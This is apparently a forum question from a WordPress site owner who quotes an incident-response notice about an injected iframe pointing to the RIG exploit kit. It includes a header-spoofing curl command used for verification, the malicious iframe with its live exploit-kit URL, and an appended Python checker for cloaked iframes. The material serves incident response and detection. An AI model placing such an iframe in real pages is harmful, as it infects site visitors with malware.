I received an email from a certain security incident response team acting on behalf of a United States department, and it says:
The below URL is currently being used to deliver a payload of malicious software to a visiting victim’s computer. The current malicious payload appears to be on a server under your control and we are working on behalf of US Department of Health and Human Services (HHS) to remove the infectious content.
The above URL has been compromised, code containing a malicious iframe that points to the RIG exploit kit has been added to the website. A sample of the iframe pointing to the RIG exploit kit is below.
3) On a Linux or Mac system, open the Terminal and execute the following command after removing all bracket characters – these: [] – and changing all instances of "hXXp" to "http":
curl -H "Referer:hXXp://www[.]ourhostedweb[.]com/index[.]php/url-name/" -H "User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "hXXp://www.victimweb[.]com/"
Search for the term "iframe" in the returned source code. There will be an iframe on line 105 whose source URL is the exploit kit content. Currently this content is being sourced from www[.]ourhostedweb[.]com – this may change at any time as long as the site remains compromised.
and line number 105 contains the following iframe code:
<iframe src="http://gone.MDVEND.COM/?oq=m3WpvAoLeZRbFLhhUPULVAwn45aBlIX_qmnhkjUyRDK1sWA-xOKUTp1u9CWUbI&es_sm=147&q=wXjQMvXcJwDQD4bGMvrESLtNNknQA0KK2Iv2_dqyEoH9fmnihNzUSkr26B2aC&ie=Windows-1252&sourceid=yandex&aqs=yandex.114e103.406b1a7"width="258" height="266"></iframe>
Edit: contact given in the mail: Email: [email protected] Office: +1.253.590.4100 x0 | Fax: +1.888.239.6932 x0
The site is developed using WordPress.
What are the necessary actions I can take for this?
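The check the email describes (fetch the page with and without the Referer and User-Agent headers, then look for the iframe) can be automated. This is an added example, not part of the original post or the email. It compares two saved responses and reports the iframes served only to the request carrying the headers. The hosts `victim.example`, `video.example` and `injected.example`, the sample HTML and the function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collects (line_number, src) for every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            src = dict(attrs).get("src") or ""
            self.found.append((self.getpos()[0], src))


def _host(value):
    """Lower-case a host name and drop a leading 'www.'."""
    value = (value or "").lower()
    return value[4:] if value.startswith("www.") else value


def external_iframes(html, site_host):
    """Return (line, src) for iframes whose host differs from site_host."""
    parser = IframeCollector()
    parser.feed(html)
    site = _host(site_host)
    return [(line, src) for line, src in parser.found
            if _host(urlparse(src).hostname) not in ("", site)]


def cloaked_iframes(plain_html, spoofed_html, site_host):
    """Iframes present only in the response to the request with the headers."""
    baseline = {src for _, src in external_iframes(plain_html, site_host)}
    return [(line, src) for line, src in external_iframes(spoofed_html, site_host)
            if src not in baseline]


# Constructed sample responses: PLAIN stands for a fetch without the headers,
# SPOOFED for a fetch with the Referer and User-Agent from the email.
PLAIN = "\n".join([
    "<html>", "<body>",
    '<iframe src="https://video.example/embed/1"></iframe>',
    "</body>", "</html>"])
SPOOFED = "\n".join([
    "<html>", "<body>",
    '<iframe src="https://video.example/embed/1"></iframe>',
    '<iframe src="http://injected.example/?q=abc" width="258" height="266"></iframe>',
    "</body>", "</html>"])
```

An iframe that shows up only in the second response is content served conditionally on the request headers, which is why a plain fetch of the page can look clean while the site is still compromised.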